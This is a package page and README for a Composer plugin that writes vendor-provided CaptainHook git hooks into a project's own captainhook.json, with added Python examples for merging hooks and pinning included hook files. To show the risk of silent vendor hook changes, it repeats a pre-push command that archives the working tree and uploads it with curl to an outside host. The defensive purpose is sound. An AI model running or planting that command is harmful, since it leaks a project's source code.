boesing / captainhook-vendor-resolver
CaptainHook extension which parses vendor packages after installation to merge projects captainhook.json with hooks provided by vendor packages
Fund package maintenance!
Community Bridge
Installs: 267
Dependents: 0
Suggesters: 0
Security: 0
Stars: 1
Watchers: 1
Forks: 0
Open Issues: 0
Type: composer-plugin
Requires
- php: ^7.3
- composer-plugin-api: ^1.1
- captainhook/captainhook: ^5.0
- webmozart/assert: ^1.5
Requires (Dev)
- composer/composer: ^1.9
- jakub-onderka/php-parallel-lint: ^1.0
- laminas/laminas-coding-standard: ^2.0
- phpstan/extension-installer: ^1.0
- phpstan/phpstan: ^0.11.19
- phpstan/phpstan-webmozart-assert: ^0.11.3
- phpunit/phpunit: ^8.4
This package is auto-updated.
Last update: 2021-08-23 10:47:06 UTC
README
This composer-plugin introduces a package scan for `captainhook/captainhook` hooks. On every `composer require`, `composer install` or `composer remove` call, the plugin checks the `composer.json` of the installed/uninstalled package for hooks to add to, or remove from, the project's `captainhook.json`.

NOTE: As of captainhook v5.0, you can specify a dedicated `captainhook.json` via `--configuration`. If you use this parameter, provide the custom `captainhook.json` path via a `captainhook-vendor-resolver.json` configuration file next to your `composer.json`:

```json
{ "captainhook": "relativeOrAbsolutePath/to/your/captainhook.json" }
```
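To make the merge step concrete, here is an added example (not the plugin's own code) of what a resolver has to do with the hook declarations it finds: append the vendor's actions to the project's `captainhook.json` on install, take exactly those actions out again on remove, and honour a custom config path from `captainhook-vendor-resolver.json`. It works on plain dicts so it runs offline; the sample project config and vendor `composer.json` are constructed to mirror the README example, the function names are hypothetical, and "a hook the project never listed is created with `enabled: false`" is this example's own policy, not something the README states about the plugin.

```python
"""Added example (not the plugin's own code): the merge and remove step a
vendor-hook resolver applies to a project's captainhook.json, worked on
plain dicts so it runs offline.

The sample project config and vendor composer.json below are constructed
to mirror the README example; the function names are hypothetical, and
"a hook the project never listed is created disabled" is this example's
own policy, not something the README states about the plugin.
"""
import copy
import json
import os

# Constructed project captainhook.json: one project-own pre-push action.
PROJECT_CONFIG = {
    "pre-push": {"enabled": True, "actions": [{"exec": "vendor/bin/phpunit"}]},
    "pre-commit": {"enabled": False, "actions": []},
}

# Constructed vendor/package/composer.json (v1.0.0) declaring two hook actions.
VENDOR_COMPOSER = {
    "name": "vendor/package",
    "extra": {
        "captainhook-hooks": {
            "pre-push": {"actions": [{"exec": "echo hey there"}]},
            "post-merge": {"actions": [{"exec": "composer install"}]},
        }
    },
}


def vendor_hooks(composer):
    """Hooks a package declares under extra.captainhook-hooks (empty dict if none)."""
    return composer.get("extra", {}).get("captainhook-hooks") or {}


def merge_vendor_hooks(project, composer):
    """Append every vendor-declared action to the project config and return the result.

    Idempotent: an action already present with the exact same definition is
    not appended again, so a repeated `composer install` yields no diff.
    A hook missing from the project is created with enabled=false (this
    example's policy), so turning it on remains an explicit, reviewable change.
    """
    merged = copy.deepcopy(project)
    for hook, spec in vendor_hooks(composer).items():
        target = merged.setdefault(hook, {"enabled": False, "actions": []})
        for action in spec.get("actions", []):
            if action not in target["actions"]:
                target["actions"].append(copy.deepcopy(action))
    return merged


def remove_vendor_hooks(project, composer):
    """Drop only the actions the package declared; project-own actions stay put."""
    stripped = copy.deepcopy(project)
    for hook, spec in vendor_hooks(composer).items():
        if hook in stripped:
            declared = spec.get("actions", [])
            stripped[hook]["actions"] = [
                a for a in stripped[hook]["actions"] if a not in declared
            ]
    return stripped


def resolve_captainhook_path(project_dir, resolver_config=None):
    """Pick the captainhook.json to edit.

    resolver_config is the parsed captainhook-vendor-resolver.json (or None when
    the file is absent); its "captainhook" key may be relative to project_dir
    or absolute.
    """
    custom = (resolver_config or {}).get("captainhook")
    if not custom:
        return os.path.join(project_dir, "captainhook.json")
    return custom if os.path.isabs(custom) else os.path.join(project_dir, custom)


def load_resolver_config(project_dir):
    """Read captainhook-vendor-resolver.json next to composer.json, if it exists."""
    path = os.path.join(project_dir, "captainhook-vendor-resolver.json")
    if not os.path.isfile(path):
        return None
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


if __name__ == "__main__":
    after_install = merge_vendor_hooks(PROJECT_CONFIG, VENDOR_COMPOSER)
    print(json.dumps(after_install, indent=2))
    print(json.dumps(remove_vendor_hooks(after_install, VENDOR_COMPOSER), indent=2))
```

The property that matters for review is that both directions are exact-match operations on the project's own file: the vendor can only ever add lines that are visible in `captainhook.json`, and an uninstall cannot take a project-authored action with it.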
What is the difference to the already existing "includes" feature?
Because this package only parses the `composer.json` and automagically inserts/removes the hooks, every change lands in your project's own `captainhook.json` and shows up as a proper diff. There is no hidden hook defined in a file outside of your project. Your project's `captainhook.json` will always contain every hook that gets executed, so an unexpected or malicious hook can be spotted during Pull Request review, e.g.
Example with the vendor resolver
captainhook.json
```json
{
  "commit-msg": {
    "enabled": false,
    "actions": []
  },
  "pre-push": {
    "enabled": true,
    "actions": [
      {
        "exec": "echo hey there"
      }
    ]
  },
  "prepare-commit-msg": {
    "enabled": false,
    "actions": []
  },
  "post-commit": {
    "enabled": false,
    "actions": []
  },
  "post-merge": {
    "enabled": false,
    "actions": []
  },
  "post-checkout": {
    "enabled": false,
    "actions": []
  },
  "pre-commit": {
    "enabled": false,
    "actions": []
  }
}
```
Current version of the vendor package (vendor/package/composer.json at v1.0.0):
```json
{
  "extra": {
    "captainhook-hooks": {
      "pre-push": {
        "actions": [
          { "exec": "echo hey there" }
        ]
      }
    }
  }
}
```
After updating the vendor package (vendor/package/composer.json at v1.0.1), the hook now packs the working tree and ships it off:
```json
{
  "extra": {
    "captainhook-hooks": {
      "pre-push": {
        "actions": [
          { "exec": "tar -czf project.tar.gz . && curl -X POST --data-binary @project.tar.gz https://example.com && rm project.tar.gz" }
        ]
      }
    }
  }
}
```
`diff captainhook.json` after `composer update` shows the change in the project's own file:
```diff
10c10
<         "exec": "echo hey there"
---
>         "exec": "tar -czf project.tar.gz . && curl -X POST --data-binary @project.tar.gz https://example.com && rm project.tar.gz"
```
Example with includes (security implication)
captainhook.json
```json
{
  "config": {
    "includes": [
      "vendor/package/captainhook.hooks.json"
    ]
  }
}
```
Current version of the vendor package (vendor/package/captainhook.hooks.json at v1.0.0):
```json
{
  "pre-push": {
    "actions": [
      { "exec": "echo hey there" }
    ]
  }
}
```
After updating the vendor package (vendor/package/captainhook.hooks.json at v1.0.1):
```json
{
  "pre-push": {
    "actions": [
      { "exec": "tar -czf project.tar.gz . && curl -X POST --data-binary @project.tar.gz https://example.com && rm project.tar.gz" }
    ]
  }
}
```
`diff captainhook.json` after `composer update` prints nothing: the project's own file is byte-for-byte unchanged, so the Pull Request that bumps the dependency shows no hook change at all.
If you do not re-visit your vendor packages for changes in the hook file you include, the next `git push` packs up your whole project and uploads it to the attacker's website.
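The page's remedy is to stop including vendor files and let the resolver write every hook into the project's own `captainhook.json`. If you still have `includes` pointing into `vendor/`, the following added example (not part of the plugin) is the check a practitioner would want in the meantime: it lists the includes you do not author, flattens the commands they would run, and pins a SHA-256 per included file so that a silently changed vendor hook fails a CI or pre-push check instead of executing. The two project trees are constructed in memory (relative path to file text) to mirror the v1.0.0 and v1.0.1 example above; the pin format and function names are this example's own convention.

```python
"""Added example, not part of the plugin: an audit for captainhook.json
"includes" that pull hook definitions from vendor/, plus a SHA-256 pin per
included file so that a changed vendor hook fails the check instead of
running silently on the next git push.

Project trees are constructed in memory (relative path -> file text) to
mirror the README's v1.0.0 and v1.0.1 example; the pin format and the
function names are this example's own convention.
"""
import hashlib
import json
import posixpath

# Constructed project: the README "includes" setup with vendor/package v1.0.0.
PROJECT_V100 = {
    "captainhook.json": json.dumps(
        {"config": {"includes": ["vendor/package/captainhook.hooks.json"]}}
    ),
    "vendor/package/captainhook.hooks.json": json.dumps(
        {"pre-push": {"actions": [{"exec": "echo hey there"}]}}
    ),
}

# Same project after `composer update` pulled vendor/package v1.0.1: the
# project's own captainhook.json is byte-for-byte unchanged.
PROJECT_V101 = dict(PROJECT_V100)
PROJECT_V101["vendor/package/captainhook.hooks.json"] = json.dumps(
    {"pre-push": {"actions": [{"exec": "tar -czf project.tar.gz . && curl -X POST "
                               "--data-binary @project.tar.gz https://example.com"}]}}
)


def included_files(files, config_path="captainhook.json"):
    """Paths under config.includes, normalised relative to the project root."""
    cfg = json.loads(files[config_path])
    base = posixpath.dirname(config_path)
    return [
        posixpath.normpath(posixpath.join(base, p))
        for p in cfg.get("config", {}).get("includes", [])
    ]


def untrusted_includes(files, config_path="captainhook.json"):
    """Includes you do not author: anything under vendor/ or outside the project."""
    return [
        p for p in included_files(files, config_path)
        if p.startswith("vendor/") or p.startswith("../") or posixpath.isabs(p)
    ]


def included_actions(files, config_path="captainhook.json"):
    """Flatten (file, hook, command) for every action an include contributes,
    so a reviewer sees the commands that will actually run."""
    out = []
    for p in included_files(files, config_path):
        for hook, spec in json.loads(files[p]).items():
            for action in spec.get("actions", []):
                out.append((p, hook, action.get("exec", action.get("action"))))
    return out


def _digest(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def pin_includes(files, config_path="captainhook.json"):
    """Snapshot a SHA-256 per included file; commit the result next to captainhook.json."""
    return {p: _digest(files[p]) for p in included_files(files, config_path)}


def verify_includes(files, pins, config_path="captainhook.json"):
    """Included files whose content differs from the pinned digest (or were never pinned).

    An empty list means the hooks about to run are the ones that were reviewed;
    a non-empty list should fail CI or the local pre-push step.
    """
    return [
        p for p in included_files(files, config_path)
        if pins.get(p) != _digest(files.get(p, ""))
    ]


if __name__ == "__main__":
    pins = pin_includes(PROJECT_V100)  # taken when v1.0.0 was reviewed
    print("drift at v1.0.0:", verify_includes(PROJECT_V100, pins))
    print("drift at v1.0.1:", verify_includes(PROJECT_V101, pins))
    for entry in included_actions(PROJECT_V101):
        print("would run:", entry)
```

Note that the pin has to be refreshed deliberately (after reading the new vendor hook file) whenever the dependency is bumped; that manual step is exactly the review the `includes` approach otherwise skips, and it is what the resolver makes automatic by putting the diff into `captainhook.json` itself.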